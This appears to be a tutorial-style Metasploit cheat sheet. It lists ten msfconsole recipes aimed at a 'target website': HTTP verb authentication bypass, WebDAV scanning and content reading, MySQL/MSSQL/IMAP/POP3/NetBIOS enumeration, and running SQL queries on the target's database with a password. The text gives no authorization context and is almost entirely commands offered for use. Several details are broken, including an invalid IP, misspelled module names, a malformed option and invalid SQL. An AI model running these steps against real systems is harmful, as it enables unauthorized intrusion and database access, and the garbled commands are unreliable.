1) BYPASSING THE DIFFERENT HTTP VERBS AUTHENTICATIONS OF TARGET:
We can by[ass the authentications used by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/http/verb_auth_bypass)
(show option)
(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.200)
(set PATH + path of http auths) e.g. (set PATH /xmpp/)
(run)
2) CHECKING THE ENABLING OF WEBDAV ON TARGET WEBSITE:
We can check the enabling and disabling of webdav of different hosts of our target website network by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/http/webdav_scnner)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-110)
(set THREADS + numbers of attacks) e.g. (set THREADS 20)
(run)
3) FINDING THE CONTENT OF DIFFERENT FILES OF TARGET WEBSITE USING WEBDAV:
We can see the content of different files of target website using webdav enabling of target by using following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/http/webdav_website_content)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-110)
(run)
4) DETECTION OF MYSQL VERSION OF TARGET:
We can detect the mysql version of target website by using following commands;
(msfconsole)
(use auxiliary/scanner/mysql/mysql_version)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set THREADS + numbers of attacks) e.g. (set THREADS 20)
(run)
5) FINDING THE DETAIL OF LISTENING TCP PORTS OF MSSQL SERVER OF TARGET WEBSITE:
We can find mssql server listening tcp ports of target by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/mssql/mssql_ping)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set THREADS + numbers of attacks) e.g. (set THREADS 20)
(run)
6) FINDING THE DATABASE DETAIL OF MSSQL OF TARGET:
We can find the mssql database detail of our target website for further database attacks by using following commands in metasploit;
(msfconsole)
(use auxiliary/admin/mssql/mssql_idf)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set NAMES username/password)
(set PASSWORD + password of mssql of target) e.g. (set PASSWORD password123)
(run)
7) RUNNING SQL QUERIES ON DATABASE OF TARGET:
We can perform sql queries against the database of target by using following commands in metasploit;
(msfconsole)
(use auxiliary/admin/mssql/mssql_sql)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set PASSWORD + password of mssql server of target) e.g. (set PASSWORD password1)
(set SQL + sql query to run) e.g. (set SQL use login;select * userpass)
(run)
8) FINDING THE SOME DETAIL IMAP OF TARGET WEB SERVER:
We can find imap version and banners detail of imap server of target by using following commands in Metasploit;
(msfconsole)
(use auxiliary/scanner/imap/imap_version)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-10)
(set THREADS + numbers of attacks) e.g. (set THREADS 20)
(run)
9) FINDING THE NETBIOS NAME OF TARGET BY SQUENTIAL NETBIOS PROBES:
We can find the detail of netbios names of target ips range by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/netbios/nbname_probe)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-10)
(set THREADS + numbers of attacks) e.g. (set THREADS 11)
(run)
10) FINDING THE POP3 VERSIONS OF TARGET IPS RANGE:
We can find the versions of pop3 mail servers of target by using following commands in metasploit;
(msfconsole)
(use auxiliary/scanner/pop3/pop3_version)
(show options)
(set RHOSTS + ips range of target) e.g. (set RHOSTS 192.168.8.4-20)
(set THREADS + numbers of attacks) e.g. (set THREADS 20)
(run)